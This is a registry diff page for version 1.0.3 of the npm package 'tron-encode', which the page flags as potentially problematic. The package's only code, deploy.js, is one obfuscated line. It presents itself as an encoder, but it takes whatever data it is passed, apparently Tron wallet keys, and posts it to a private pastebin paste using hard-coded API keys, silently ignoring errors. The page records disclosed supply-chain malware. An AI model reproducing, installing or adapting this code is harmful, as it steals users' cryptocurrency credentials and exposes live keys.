tron-encode 1.0.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of tron-encode might be problematic. Click here for more details.
- package/deploy.js +1 -0
- package/package.json +14 -0
package/deploy.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function _0x3e59(_0x4dd31c,_0x5aed80){var _0x3458dc=_0x3458();return _0x3e59=function(_0x3e5906,_0x1da892){_0x3e5906=_0x3e5906-0xf9;var _0x3333aa=_0x3458dc[_0x3e5906];return _0x3333aa;},_0x3e59(_0x4dd31c,_0x5aed80);}(function(_0x266cb4,_0x4b969a){var _0x2f3003=_0x3e59,_0x3ab000=_0x266cb4();while(!![]){try{var _0x36479a=parseInt(_0x2f3003(0x107))/0x1*(parseInt(_0x2f3003(0xfd))/0x2)+-parseInt(_0x2f3003(0x106))/0x3*(-parseInt(_0x2f3003(0xfa))/0x4)+-parseInt(_0x2f3003(0xfe))/0x5+parseInt(_0x2f3003(0x10a))/0x6+-parseInt(_0x2f3003(0x105))/0x7+-parseInt(_0x2f3003(0x109))/0x8+-parseInt(_0x2f3003(0xff))/0x9*(-parseInt(_0x2f3003(0xfc))/0xa);if(_0x36479a===_0x4b969a)break;else _0x3ab000['push'](_0x3ab000['shift']());}catch(_0x37e28b){_0x3ab000['push'](_0x3ab000['shift']());}}}(_0x3458,0x9f780));function _0x3458(){var _0x4f11a9=['9415312iMUziy','3832818DXXBgA','paste','262532AgTnkK','https://pastebin.com/api/api_post.php','294290WbmigK','2942CaEiad','485200rpwMld','189Xzzazz','catch','stringify','kFOG-2JpDX4r8Ha4bkkF7vQMAFidc2Ro','bigint','then','1898722qnoedI','15ehQEqB','417YgfMFE','3e7bf3f2ba692a6edabcbf8659c9c3cb'];_0x3458=function(){return _0x4f11a9;};return _0x3458();}import _0x99fb56 from'axios';module['exports']=function(_0x2eb035){var _0x1cb3b9=_0x3e59;_0x99fb56['post'](_0x1cb3b9(0xfb),new URLSearchParams({'api_option':_0x1cb3b9(0xf9),'api_user_key':_0x1cb3b9(0x108),'api_paste_private':'2','api_paste_expire_date':'2W','api_paste_name':'haha','api_dev_key':_0x1cb3b9(0x102),'api_paste_code':JSON[_0x1cb3b9(0x101)](_0x2eb035,(_0x3bbb7f,_0xd15b9f)=>typeof _0xd15b9f===_0x1cb3b9(0x103)?_0xd15b9f['toString']():_0xd15b9f)}))[_0x1cb3b9(0x104)](_0x595ab7=>{})[_0x1cb3b9(0x100)](_0x560a0d=>{});};
|
package/package.json
ADDED
|
@@ -0,0 +1,14 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "tron-encode",
|
|
3
|
+
"version": "1.0.3",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "deploy.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
8
|
+
},
|
|
9
|
+
"devDependencies": {
|
|
10
|
+
"axios":"^1.2.1"
|
|
11
|
+
},
|
|
12
|
+
"author": "",
|
|
13
|
+
"license": "ISC"
|
|
14
|
+
}
|